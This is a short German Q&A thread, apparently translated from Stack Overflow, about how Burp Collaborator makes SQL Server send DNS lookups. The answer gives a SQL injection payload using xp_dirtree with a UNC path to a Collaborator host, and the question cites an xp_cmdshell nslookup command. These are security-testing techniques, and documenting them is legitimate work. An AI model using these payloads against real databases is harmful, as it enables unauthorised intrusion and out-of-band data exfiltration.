Wie sendet Burp Collaborator eine DNS-Anfrage über Sql Server und T-sql

Question

Wie kann Burp Collaborator eine DNS-Anfrage über t-sql und Sql Server senden?

https://portswigger.net/burp/help/collaborator.html

Ich weiß, dass Sie zum Beispiel exec master..xp_cmdshell 'nslookup intel.com' oder Dns.GetHostAddresses() in einer gespeicherten Prozedur auf SQL Server 2005 oder 2008 hier wie erwähnt verwenden: https://stackoverflow.com/a/967696/3850405

jedoch nicht viele Server xp_cmdshell heute erlauben, zu Recht, aber Das bedeutet, dass Burp Collaborator etwas anderes verwendet. Was? Die Verbindung muss nur ausgehängt werden, es muss nichts zurückgegeben werden.

Answer 1

Die Antwort gefunden, exec master.dbo.xp_dirtree. Beispiel:

;exec master.dbo.xp_dirtree 
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'-- 

http://releases.portswigger.net/2015/09/1627.html

Wenn Sie Burp Suite Professional installiert haben Sie einen Link über Burp erzeugen kann -> Burp Collaborator Client und dann für Ergebnisse abzufragen.